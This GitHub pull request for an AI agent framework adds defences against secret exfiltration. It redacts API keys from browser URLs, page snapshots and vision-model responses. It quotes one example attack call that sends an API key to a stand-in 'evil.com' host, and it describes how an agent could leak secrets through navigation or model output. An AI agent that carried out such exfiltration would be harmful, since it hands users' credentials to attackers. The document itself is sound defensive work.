Skip to content

security: block secret exfiltration via browser URLs and LLM responses#4371

Open
0xbyt4 wants to merge 2 commits intoNousResearch:mainfrom
0xbyt4:fix/browser-secret-exfil
Open

security: block secret exfiltration via browser URLs and LLM responses#4371
0xbyt4 wants to merge 2 commits intoNousResearch:mainfrom
0xbyt4:fix/browser-secret-exfil

Conversation

@0xbyt4
Copy link
Copy Markdown
Contributor

@0xbyt4 0xbyt4 commented Mar 31, 2026

Summary

Closes remaining secret exfiltration vectors through browser navigation, web extraction, and auxiliary/vision LLM calls.

Companion to #4364 which covers execute_code, tool results, memory, and skills.

Vulnerabilities Fixed

1. Browser URL exfiltration

Agent could embed secrets in URL parameters and navigate to attacker-controlled server:

browser_navigate("https://evil.com/steal?key=sk-ant-api03-...")

Fix: Scan URLs for known API key patterns before navigating. Applies to both browser_navigate and web_extract_tool.

2. Browser snapshot leak to auxiliary LLM

A page displaying env vars or API keys would send secrets to the auxiliary extraction model via _extract_relevant_content — before run_agent.py's general redaction layer ever sees the tool result.

Fix: Redact snapshot text before the auxiliary LLM call, and redact the auxiliary LLM's response.

3. Vision LLM response leak

Vision analysis of screenshots containing secrets (e.g. terminal showing env vars) could echo those secrets back in the analysis text. Screenshots themselves cannot be text-redacted, but the LLM's text response can.

Fix: Redact vision LLM responses in both browser_vision and camofox_vision.

Test plan

  • 10 new tests covering URL blocking, snapshot redaction, annotation redaction, and LLM response redaction
  • All existing browser tests passing
0xbyt4 added 2 commits April 1, 2026 02:04
…M calls

Three exfiltration vectors closed:

1. Browser URL exfil — agent could embed secrets in URL params and
   navigate to attacker-controlled server. Now scans URLs for known
   API key patterns before navigating (browser_navigate, web_extract).

2. Browser snapshot leak — page displaying env vars or API keys would
   send secrets to auxiliary LLM via _extract_relevant_content before
   run_agent.py's redaction layer sees the result. Now redacts snapshot
   text before the auxiliary call.

3. Camofox annotation leak — accessibility tree text sent to vision
   LLM could contain secrets visible on screen. Now redacts annotation
   context before the vision call.

10 new tests covering URL blocking, snapshot redaction, and annotation
redaction for both browser and camofox backends.
LLM responses from browser snapshot extraction and vision analysis
could echo back secrets that appeared on screen or in page content.
Input redaction alone is insufficient — the LLM may reproduce secrets
it read from screenshots (which cannot be text-redacted).

Now redact outputs from:
- _extract_relevant_content (auxiliary LLM response)
- browser_vision (vision LLM response)
- camofox_vision (vision LLM response)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

1 participant